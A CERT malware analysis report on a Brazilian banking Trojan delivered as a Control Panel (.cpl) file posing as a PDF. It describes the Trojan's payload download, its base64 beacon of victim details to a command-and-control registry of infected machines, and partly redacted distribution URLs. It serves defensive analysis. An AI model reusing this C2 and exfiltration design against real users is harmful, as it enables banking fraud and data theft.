English
EspañolBanking Trojan that presents itself as a Control Panel icon
Summary
The sample analyzed on this occasion was obtained from a report made to the Malware Analysis Team of the UNAM-CERT, where we were informed about some allegedly malicious programs found in Brazilian web sites. After the analysis, it was discovered that the sample sent information of the infected computers, such as: operating system, user privileges, security plugins of banks and IP address to a log that appears to be hosted in a legitimate URL.
Introduction
It can be seenon the picture below that the extension of the downloaded file is "cpl". CPL files are dynamic link libraries (DLL for its acronym in English) that contain the functionality of the icons in the Control Panel, i.e., each of the tools you see contains a cpl file in the C:\WINDOWS\System32\ directory that loads automatically when the user starts Control Panel. A diferencia de los archivos .dll, los archivos con extensión cpl pueden ser ejecutados al dar doble clic sobre ellos.
In the context ofmalicious software, cpl is a format for executable files widely used by developers of banking Trojans, particularly in Brazil. As mentioned in the research done by Trend Micro, the most common form of propagation for this type of malware is through emails that appear to come from known financial organizations, which convinces the victims to click on a link to download receipts or check their transactions. In this case the name of the sample, which appears to be a PDF file, includes the word "pedido" which can be translated as "application".
Dynamic Analysis
The sample wasexecuted in a controlled environment without Internet access and network traffic was monitored using Wireshark. In the screenshot you can see the requests made to the domains ecoxxxxx.com.br and ricxxx.com.br.
Once it resolves these domains, it attempts to connect to port 80 (HTTP). The cpl file, like any 32-bit DLL, is loaded into memory and executed by the rundll32.exe Windows utility.
.
The sample makes a GET request to the file "unistals.txt" on the domain "ricxxx.com.br" and sends a string on the "query" parameter to the domain "acoxxxxx.com.br", as shown on the network traffic below.
Using thecontents of the file "unistals.txt", hosted on the server of the domain ricxxx.com.br, the sample creates the executable called "unistals.exe" in the C:\Documents and Settings\User\Application Data\. Because the first tests were conducted in an environment without Internet access, these files and directories that stored them were created in the /var/www/ directory of a test server.
The contentsofunistals.exeare shown below:
The file Songs.exeis also created in the C:\Documents and Settings\User\Application Data\ without content.
Network Activity
The following string, encoded in base64, is sent, as seen on the next capture:
YWRtaW4sNDgtNDctQkItNEItQkItNDcsV2luZG93cyBYUCgzMiksMTAwLFVOS05PV04tRjkzRDMwRSwsLG5hbw==
And theASCII representation is:
| admin, | 48-47-BB-4B-BB-47, | Windows XP(32), | 100, | UNKNOWN-F93D30E, | , | , | nao |
| 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 |
At first glance,it can be deduced that:
1 = Privileges of the user that logged in
2 = MAC address of the computer
3 = Windows Version
5 = Computer Name
After consulting the URL of the filethat the sample needed, http://www.rixxxx.com.br/imagens/xxxxxx/files/unistals.txt, we realized that it was no longer available. Whereas www.ecoxxxxx.com.br/modules/mods/sis.php did not show any information.
However,when directly writing the base64 encoded string as a parameter on the browser, we were redirected to the site www.ecoxxxxx.com.br/modules/xxxx/sis.php?query=Listar, which seems to be a registry of infected computers. From the names of the columns is possible to identify the fields 4, 6, 7 and 8 of the encoded string that was sent from the infected computer to the ecoxxxxx.com.br site using the GET method:
4 = Possibly the version of the Trojan
6 = SecurityPlugins of the banks
7 = Antivirusinstalled on the infected computer
8 = Commands
Clicking on the “Totalizar” link displays the total number of registered computers which, at the time of the analysis, was 753.
Most of the infected computers were from Brazil, although on the list we also found:
- · 15 from the United States
- · 2 from Spain
- · 2 from Germany
- · 2 from the United Kingdom
- · 1 from Argentina
- · 1 from the Philippines
- · 1 from Australia
- · 1 from Switzerland
- · 1 from Holland
As for the operating systems of the infected computers, the results were as follow:
- · 172 with Windows XP
- · 529 with Windows 7
- · 24 with Windows 8
- · 18 with Windows Vista
- · 1 with Windows Server 2003
- · 9 with unknown systems for the Trojan
On the “Plugins” field there were references to the following Brazilian institutions:
- · BB = Banco do Brasil
- · SANTA = Santander
- · BRADA = Banco Bradesco
- · ITAU = Banco Itaú
- · CEF = Caixa Econômica Federal
- · SICREDI = Banco Sicredi
- · INFOSEG = Integrates the databases of public security departments of Brazil
- · BANESTES = Banco do Estado do Espíritu Santo
- · MERCANTIL = Banco Mercantil do Brasil
When searching onGoogle the string "NF_pedido04 - 4589511.pdf" on Google returns us 73 results, mostly related to analysis of file or URL where you could download the sample. In the following table you can see the URLs found, or if the trojan is not active and the web server. In most places the malicious program was housed in directories containing images. In places that have an "inactive" status, access to these directories has been restricted and the Trojan has been deleted.
| URL | State | Web Server |
| http://prexxxxx.com.br/fotos/nf_pedido04-4589511.pdf.zip | Inactive | IIS |
| http://proxxx.agr.br/imgs/NF_Pedido04-4589511.pdf.zip | Inactive | IIS |
| http://camaraxxxxxxxxx.sp.gov.br/NF_Pedido04-4589511.pdf.zip | Inactive | IIS |
| www.interxxxxxxxxx.com.br/imagens-produtos/NF_Pedido04-4589511.pdf.zip | Active | IIS |
| http://xxxxresponde.com.br/wp-content/NF_Pedido04-4589511.pdf.zip | Active | Apache |
| http://200.xxx.xxx.7/images/NF_Pedido04-4589511.pdf.zip | Active | Apache |
We downloadedthe files from the active sites and compared the md5 hashes to see if we were dealing with the same sample. As can be seen, there are three unique samples, probably from the same malware family. This can be tested in several ways: using VirusTotal or even a single antivirus, analyzing the samples statically or dynamically or using a heuristic method.
This timewe will use a heuristic method based on system calls. The general procedure is as follows: the number of functions that each sample calls from the dynamic link libraries is extracted to create numerical vectors and then the Euclidean distance between the original sample and the vectors b, c and d is calculated. If the downloaded samples are similar to the analyzed sample, the distance between them will have a low value.
As you can seein the picture above, the samples are similar so we can say they belong to the same malware family.
Technical Details
Asmentioned in previous analysis, step one is to know whether the sample is packed or not. The Exeinfo PE tool was used and the result indicated that the sample was compressed using UPX. It is noteworthy that the samples b and d, downloaded from compromised websites, were also packed with UPX.
The packer is removed from command line.
We opened the unpacked sample with IDA Pro to analyze it and we checked the strings to see if we could obtain useful data about the function of the sample.
The domains that the sample consulted were not found amongst the strings, nor the names of the executables that were downloaded, the directories or the registry keys modified. Instead, there were strings that seem to be encrypted, which leads us to believe that the creators of this malware hid important data to hinder the analysis of the sample.
The VirusTotal reports of the analyzed trojan and the similar samples that were downloaded from the ULRs with malicious content, are shown below:
The URLs were already reported to avoid that this trojan keeps propagating.
.
